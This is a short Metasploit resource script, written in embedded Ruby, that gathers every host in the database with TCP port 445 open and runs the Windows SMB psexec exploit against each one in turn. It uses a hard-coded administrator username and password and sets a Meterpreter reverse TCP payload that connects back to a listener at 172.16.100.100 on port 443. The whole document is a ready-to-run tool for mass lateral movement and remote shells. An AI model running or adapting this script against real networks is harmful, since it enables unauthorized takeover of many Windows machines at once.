Rapid Fire PSExec resource script uses port number instead of service name
<ruby>
# Collect every host in the Metasploit database that has an open TCP service on
# port 445. Matching on the port number rather than the service name means
# records whose name field was never filled in are still selected.
hosts = []
framework.db.services.each do |service|
  if service.port == 445 && service.state == 'open' && service.proto == 'tcp'
    hosts << { 'ip' => service.host.address }
  end
end

# The modules do not start their own handler; a multi/handler listening on
# LHOST:LPORT is expected to be running already.
self.run_single("set DisablePayloadHandler true")

# Queue one background psexec job per selected host.
hosts.each do |rhost|
  self.run_single("set RHOST #{rhost['ip']}")
  self.run_single('use exploit/windows/smb/psexec')
  self.run_single('set PAYLOAD windows/meterpreter/reverse_tcp')
  self.run_single('set LHOST 172.16.100.100')
  self.run_single('set LPORT 443')
  self.run_single('set DisablePayloadHandler TRUE')
  self.run_single('set SMBUSER administrator')
  self.run_single('set SMBPASS l33tpassword')
  self.run_single('exploit -j')
  sleep 1
end
</ruby>